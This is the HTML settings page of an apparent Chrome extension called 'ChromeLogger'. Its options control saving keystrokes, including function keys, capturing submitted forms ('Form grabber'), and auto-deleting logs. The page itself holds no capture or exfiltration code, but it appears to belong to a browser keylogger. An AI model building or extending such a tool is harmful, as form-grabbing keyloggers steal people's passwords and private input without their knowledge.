<!DOCTYPE html>
<html ng-app="app">
<head>
	<title>ChromeLogger</title>
    <script src="viewer.js"></script>
</head>
<body ng-controller="ViewerCtrl">
    <table style="width: 80%">
    <tr>
        <td><input type="checkbox" id="allKeys" ng-click="updateSettings()"> Save function keys (CTRL, ALT, etc...)</td>
        <td><input type="checkbox" id="formGrabber" ng-click="updateSettings()"> Save submitted forms (Form grabber)</td>
        <td>Auto delete logs older than (days) <input type="input" id="autoDelete" ng-blur="updateSettings()" size=3></td>
    </tr>
    </table>
</body>
</html>